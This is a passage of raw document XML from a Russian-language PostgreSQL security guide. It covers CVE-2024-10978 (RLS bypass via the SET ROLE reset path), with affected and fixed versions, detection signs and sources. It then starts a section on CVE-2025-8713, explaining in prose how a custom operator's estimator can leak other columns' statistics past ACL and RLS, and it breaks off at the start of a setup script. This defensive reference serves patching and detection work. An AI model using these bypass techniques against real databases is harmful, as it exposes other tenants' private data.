      <w:tr w:rsidR="0019479F" w14:paraId="0AA578D1"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CB3614"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6645E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14 ноября 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2335167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189769"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755470" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5FCA68D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ACB664"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DDF344" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 17.1, 16.5, 15.9, 14.14, 13.17, 12.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5CA8AE4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250B18"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2795BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Incorrect privilege assignment в SET ROLE reset path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="15EDEEF8"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33D228"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1230FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege escalation (3.13.1) + RLS bypass (3.17.3) — два аспекта одного бага</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63F55524" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request — стандартный multi-tenant pattern (см. 3.13.1 и 3.17.1). Тот же подход для billing/financial data with RLS — стандартная архитектура SaaS. Корректная работа возможна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только на patched PG-версиях</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или с workarounds (connection-per-tenant, SET LOCAL вместо SET ROLE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D036FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDAA436" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
      <w:r>
        <w:t>: customer complaints о «not my data» — самый частый detection-vector. Application-level audit: log access patterns, compare expected tenant_id vs returned rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA81B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`auto_explain` log</w:t>
      </w:r>
      <w:r>
        <w:t>: filter expressions не matching current session role/variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AEF1A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t>: query-text с varying result-rows count between different sessions (indicator of plan-cache issue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60790834" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG version check</w:t>
      </w:r>
      <w:r>
        <w:t>: critical для ≤ 17.0/16.4/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C94C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Те же, что 3.17.1 и 3.13.1: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9479F" w14:paraId="379B891E"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52345C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Major</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5385D01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Уязвимая</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E5498F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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E7C74D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Дата</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="622D8F8F"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E8071B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.x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659464" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.0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FA844A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1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B1DB0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="21B69A21"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E95B3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.x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5DD10E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 16.4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29F222" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>16.5</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3AD97E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="38045379"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43B848" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.x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018942" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 15.8</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FB806B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.9</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7A61BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0D1BA189"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030B45" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.x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D42664" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 14.13</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D19960" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.14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F5E9EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="3D74D5F8"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10AB0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.x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7F3152" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 13.16</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93ECBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.17</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EDA8E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="4BA5799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416C33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.x</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E0C9F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 12.20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B05EED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.21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364FEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.11.2024 (EOL ветка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26374431" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313FE292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 SET ROLE / CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>тот же CVE, parallel chapter</w:t>
      </w:r>
      <w:r>
        <w:t>. Cross-ref обязателен. Граница: 3.13.1 — privilege escalation; 3.17.3 — data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE3BB8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.1 Subquery + plan-cache / CVE-2024-10976</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связанный CVE того же batch (14.11.2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9EF920" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17.5 SECURITY DEFINER функции и RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alternative bypass без CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7FF7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — parallel privilege escalation pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A14775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст batch CVE 14.11.2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F46AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> defence-in-depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D86EEEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C88EE04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2024-10978 — https://www.postgresql.org/support/security/CVE-2024-10978/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FD9DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 17.1 Release Notes (Security Fixes) — https://www.postgresql.org/docs/release/17.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF58E90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2024-10978 — https://nvd.nist.gov/vuln/detail/CVE-2024-10978</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AE249" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SET ROLE» — https://www.postgresql.org/docs/current/sql-set-role.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7677D84B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Row Security Policies» — https://www.postgresql.org/docs/current/ddl-rowsecurity.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1A3EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pganalyze blog: «PostgreSQL 17.1 security fixes» — https://pganalyze.com/blog/5mins-postgres-17-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA2CCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R8 (sources/research.md, строки 162–170)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C500B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.13.1 (related chapter — same CVE, different attack-outcome)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B89929" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.17.4 Optimizer stats обходят ACL и RLS (R26, CVE-2025-8713)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D89456" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL query planner использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>column statistics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) для оценки selectivity предикатов — это включает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n_distinct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Эти статистики собираются </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и хранятся per-column. В PostgreSQL до 17.6/16.10/15.14/14.19/13.22 (фикс 14.08.2025) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom operator может на этапе planning читать содержимое most_common_vals чужих колонок</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, обходя как ACL (нет SELECT-разрешения на колонку), так и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RLS-policies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (фильтр на rows не применяется к statistics-pool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF63EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2025-8713 — отдельная CVE от связанной CVE-2024-4317 (R17, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext.most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leak): CVE-2024-4317 leak через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>view permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, CVE-2025-8713 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom operator на planning-этапе</w:t>
      </w:r>
      <w:r>
        <w:t>, что более общий vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1569A69D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom operator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с restrict/join estimator-function, которая читает statistics через optimizer-API, и применяет этот operator в WHERE на таблицу с RLS или с restrictive ACL. Estimator-функция выполняется на planning-этапе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до проверки policies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — она получает доступ к pg_statistic entries (которые содержат actual data samples из чужих rows). Leak — выборки конкретных values, обычно top-K most common values для целевой колонки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11297FE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C4A23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий не уязвимый код — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уязвимая среда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PG до фикса) + атакующий с правом CREATE OPERATOR. Сценарий:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5854E14D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Setup БД с защищённой таблицей:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5436D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE app.salaries (</w:t>
      </w:r>
    </w:p>
